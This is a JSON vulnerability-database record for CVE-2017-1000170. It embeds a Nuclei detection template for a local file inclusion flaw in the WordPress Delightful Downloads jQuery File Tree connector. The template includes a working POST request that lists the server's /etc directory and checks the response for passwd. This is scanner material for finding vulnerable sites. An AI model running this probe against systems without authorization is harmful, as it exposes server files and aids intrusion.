{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2017-1000170/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2017-1000170/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2017-1000170/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2017-1000170/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2017-1000170/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2017-1000170"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2017-1000170"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2017/CVE-2017-1000170.yaml",
    "nuclei_template_severity": "high",
    "nuclei_template_yaml": "id: CVE-2017-1000170\n\ninfo:\n  name: WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion\n  author: dwisiswant0\n  severity: high\n  description: WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.\n  impact: |\n    Allows an attacker to include arbitrary local files, potentially leading to unauthorized access or code execution.\n  remediation: |\n    Update to the latest version of Delightful Downloads plugin or apply the patch provided by the vendor.\n  reference:\n    - https://www.exploit-db.com/exploits/49693\n    - https://github.com/jqueryfiletree/jqueryfiletree/issues/66\n    - http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000170\n    - https://github.com/ARPSyndicate/cvemon\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2017-1000170\n    cwe-id: CWE-22\n    epss-score: 0.59063\n    epss-percentile: 0.9907\n    cpe: cpe:2.3:a:jqueryfiletree_project:jqueryfiletree:*:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: jqueryfiletree_project\n    product: jqueryfiletree\n  tags: cve2017,cve,wordpress,wp-plugin,lfi,jquery,edb,packetstorm,jqueryfiletree_project,vkev,vuln\n\nhttp:\n  - method: POST\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php\"\n\n    body: \"dir=%2Fetc%2F&onlyFiles=true\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"<li class='file ext_passwd'>\"\n          - \"<a rel='/passwd'>passwd</a></li>\"\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a004830460221009a613b64de31f4fcb2685cf6a4a34d1c82c928a05b0b83dad168bf94630415c8022100e40b1f498fe478986c22dbf8daed34c31a4000f65d400e7125424f1fb0e9449e:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2017-1000170"
}